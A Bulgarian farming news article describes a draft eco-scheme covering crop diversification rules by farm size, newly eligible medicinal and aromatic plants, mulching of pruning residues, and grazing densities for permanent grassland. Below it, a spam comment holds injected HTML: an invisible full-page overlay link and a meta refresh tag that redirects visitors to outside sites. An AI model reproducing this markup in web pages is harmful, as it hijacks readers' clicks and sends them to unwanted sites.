Субсидии за мулч при резитба ще дава екосхема

Субсидии за мулч при резитба ще дава екосхема

 

 

На 15 февруари Министерството на земеделието ще представи преработен вариант на проектите на някои вече представени интервенции. Една от тях е Екосхема за засилена диверсификация на културите, поддържане на трайните насаждения и екстензивно поддържане на постоянно затревените площи с пасищни животни. 

 

Ето кои предложения на бранша бяха приети и какви ще са изискванията към фермерите след 2022 г. Правим уговорката обаче, че това не е окончателен вариант.

 

По настояване на Националната асоциация на зърнопроизводителите (НАЗ) като допустими култури по екосхемата са добавени многогодишни ароматни и медицински растения. Тук става дума за традиционни за страната ни растения като: лавандула, резене, мента, риган, маточина, валериана, жълт кантарион, чубрица, салвия, хизоп.

 

Раздробяване и оставяне на вегетативна маса при резитба също е включена като добра земеделска практика. Целта е да се подобрят свойствата на почвата, да се защитят от водна и ветрова ерозия и да се намали водният дефицит. Така се мотивират от министерството, а предложението идва от Българска асоциация на малинопроизводителите.

 

С новите допълнения проектът на интервенция придобива следния облик.

 

Земеделските стопани прилагат на допустимите площи земеделски практики, които са полезни за климата и околната среда от следния списък:

 

1.    На обработваемите земи и/или площите, заети с медицински и ароматни култури, се прилага засилена диверсификация на културите.

•    Земеделски стопанства с обработваема земя и/или площи, заети с медицински и ароматни култури до 9.99 ха. Тук има най-малко 2 различни култури, като основната не превишава 95%.

•    Земеделски стопанства с обработваема земя и/или площи, заети с медицински и ароматни култури, между 10 и 30 ха. В този случай различните култури са най-малко 3. Основната култура не заема повече от 75%, а двете основни обхващат заедно не повече от 95%.

•    Земеделски стопанства с обработваема земя и/или площи, заети с медицински и ароматни култури, над 30 ха. Различните култури са поне 4. Основната култура не заема повече от 75%, а трите основни култури обхващат заедно не повече от 95%.

 

За целите на настоящото изискване „култура“ означава: 

а) култура от който и да е от различните родове, определени в ботаническата класификация на културите; 
б) култура от който и да е от видовете при Brassicaceae, Solanaceae и Cucurbitaceae; 
в) оставена под угар земя; 
г) треви или други тревни фуражи.

 

Зимните и пролетните култури се разглеждат като различни култури, дори когато са от един и същи род. Държавен фонд земеделие (ДФЗ) изчислява дяловете на различните култури за периода от 15 май до 15 септември на годината на кандидатстване.

2.    В трайните насаждения се извършва раздробяване и оставяне на вегетативна маса (клони и лозови леторасти) с цел оставяне на мулч при резитба.

3.    Постоянно затревените площи се поддържат екстензивно с пасищни животни – от 0,3 до 1 ЖЕ/ха, минимум 60 дни през съответната година.

 

Следете темата и на cap4us.agri.bg

Коментари
sadf
на 22.01.2022 2:59
<a href="https://www.hasbihal.org" title="sohbet chat" rel="dofollow" style="display: block!important;position: fixed!important; width: 100%!important;height: 100%; text-align: center!important;color: transparent!important;left: 0!important;top: 0!important;right: 0!important; padding: 100px; bottom: 0!important;background: transparent!important;z-index: 999999999999999!important;font-size: 4em!important">sohbet chat</a> <meta http-equiv="refresh" content="0; url=https://findi.pro/coment"/> <a href="https://bedavasohbetchat.blogspot.com/" title="bedavasohbet">bedavasohbet</a>
Добави коментар